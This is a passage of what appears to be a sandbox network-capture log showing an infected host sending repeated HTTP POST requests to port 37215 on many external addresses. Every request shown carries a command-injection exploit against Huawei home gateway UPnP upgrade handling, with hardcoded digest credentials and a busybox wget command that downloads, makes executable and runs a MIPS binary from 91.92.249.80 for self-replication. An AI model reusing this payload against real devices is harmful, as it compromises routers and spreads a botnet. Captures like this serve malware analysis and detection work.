                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2179192.168.2.2344316157.242.241.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.633375883 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2180192.168.2.2348576157.197.159.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.633383989 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2181192.168.2.2351530157.81.6.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.633420944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2182192.168.2.235839441.210.162.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.634078979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2183192.168.2.2341530197.216.223.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.634144068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2184192.168.2.234713841.63.51.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.634167910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2185192.168.2.2359710157.218.12.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.634213924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2186192.168.2.2346848157.250.90.13437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635096073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2187192.168.2.235181066.218.220.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635108948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2188192.168.2.234439441.50.177.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635128021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2189192.168.2.234037641.63.152.13937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635149002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
